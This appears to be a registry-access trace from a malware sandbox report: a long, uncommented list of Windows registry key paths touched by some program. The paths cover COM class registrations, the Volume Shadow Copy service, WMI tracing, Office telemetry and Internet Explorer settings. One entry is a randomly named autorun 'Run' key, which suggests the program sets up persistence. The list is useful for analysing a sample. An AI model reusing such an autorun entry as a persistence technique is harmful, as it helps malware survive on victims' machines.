HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\AccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaxSxSHashCount
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{75121952-E0D0-43E5-9380-1D80483ACF72}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{E357FCCD-A995-4576-B01F-234630154E96}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B824B49D-22AC-4161-AC8A-9916E8FA3F7F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0000000C-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPSampledIn
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\qobyhffdhzmp201
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\MID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\SusClientId
HKEY_USERS\.DEFAULT\Control Panel\International\Geo\Nation
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\FlightUpdateTime
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\officeclicktorun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_MISC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_CM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_TRACE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_SVC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_GATEWAY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_UI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_CONTACT
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_UTIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_CLUSTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_RESOURCE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_TIP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_XA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_LOG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_MTXOCI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_ETWTRACE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_PROXY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_KTMRM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_VSSBACKUP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_PERFMON
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_TM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Sources\TRACE_LU
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Output\TraceFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Output\MemoryBufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\Tracing\Output\DebugOutEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\SourcePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\DevicePath
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\A544A85B
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B5A2C52-3EB9-470A-96E2-6C6D4570E40F}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0B5A2C52-3EB9-470A-96E2-6C6D4570E40F}\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\IdleTimeout
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{DA9F41D4-1A5D-41D0-A614-6DFD78DF5D05}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2C2787D-95AB-40D4-942D-298F5F757874}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\WBEM\CIMOM\Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\WBEM\CIMOM\Logging Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\WBEM\CIMOM\Log File Max Size
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\WMIC.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\AdminTabProcs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cli
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cli
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\CIMV2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\CIMV2
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72970BEB-81F8-46D4-B220-D743F4E49C95}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72970BEB-81F8-46D4-B220-D743F4E49C95}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72970BEB-81F8-46D4-B220-D743F4E49C95}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72970BEB-81F8-46D4-B220-D743F4E49C95}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72970BEB-81F8-46D4-B220-D743F4E49C95}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="MSVSS__PROVIDER"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WaitToKillServiceTimeout
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\LabMachine
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\CountryCode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\IsProviderIdFetchedFromLicensedName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\Language
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\DevInstall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\AudienceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\ActiveConfiguration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\1769D00C-76B0-44E0-A548-8DB5C12F3A69\culture\x-none.16\StreamPackageUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\AllowConsecutiveSlashesInUrlPathComponent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\ImpressionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\FlightNumberline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation\DisableExperimentation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\BuildNumber
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\PerpetualLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation\DisableFeatureRollout
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\AudienceImpersonatedInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Expires
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\ETag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\FirstSessionTriggered
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109C80000000000000000F01FEC\InstallProperties\WindowsInstaller
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109DD0000000100000000F01FEC\InstallProperties\WindowsInstaller
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F80000000100000000F01FEC\InstallProperties\WindowsInstaller
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreviousPreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackSource
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UISnapshotLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UILanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageExplicit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\ExeMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LangTuneUp
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UID
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\RulesRetrievalTimeCap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\ProductReleaseIds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\ProPlusRetail.TenantId
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\DisableTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToAsimov
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToFile
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\ULSQueueAbortThreshold
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesXmlDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\ClientFolder
HKEY_CURRENT_USER\Control Panel\International\Geo\Nation
